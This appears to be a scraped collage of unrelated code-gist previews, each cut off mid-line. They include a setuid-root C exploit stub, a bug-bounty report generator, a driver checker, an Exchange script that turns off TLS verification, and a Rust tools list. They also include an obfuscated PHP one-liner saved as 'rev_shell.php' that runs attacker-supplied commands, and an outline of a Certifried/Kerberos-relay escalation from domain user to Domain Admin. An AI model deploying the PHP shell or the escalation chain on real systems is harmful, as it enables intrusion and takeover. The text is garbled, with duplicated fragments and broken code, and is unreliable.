user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
import poe, sys | |
client = poe.Client("<POE_API_KEY_HERE>") | |
title=sys.argv[1] | |
path=sys.argv[2] | |
more="" | |
if len(sys.argv) > 3: | |
more="\" and here is more information: "+sys.argv[3] | |
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list | |
# Author: Oddvar Moe - @oddvar.moe | |
$drivers = get-childitem -Path c:\windows\system32\drivers | |
$web_client = new-object system.net.webclient | |
$loldrivers = $web_client.DownloadString(" https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json | |
Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count) | |
foreach ($lol in $loldrivers.KnownVulnerableSamples) | |
{ |
#!/usr/bin/python -u | |
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty | |
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW | |
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter | |
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
/* | |
* In terminal: | |
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
* This is how the code will be produced, \xa0\xb8\xba\xab will be | |
* treated as constant therefore no " needed. It is also not copyable | |
* string because of non-ascii characters | |
* | |
* Explanation: |
This is a minimal /etc/ssl/openssl.cnf
supporting legacy algorithms on modern openssl installations
where it is disabled by default.
The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).
For checking if legacy providers are enabled successfully:
$ openssl list -providers
Providers:
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
Note: I have moved this list to a proper repository. I'll leave this gist up, but it won't be updated. To submit an idea, open a PR on the repo.
Note that I have not tried all of these personally, and cannot and do not vouch for all of the tools listed here. In most cases, the descriptions here are copied directly from their code repos. Some may have been abandoned. Investigate before installing/using.
The ones I use regularly include: bat, dust, fd, fend, hyperfine, miniserve, ripgrep, just, cargo-audit and cargo-wipe.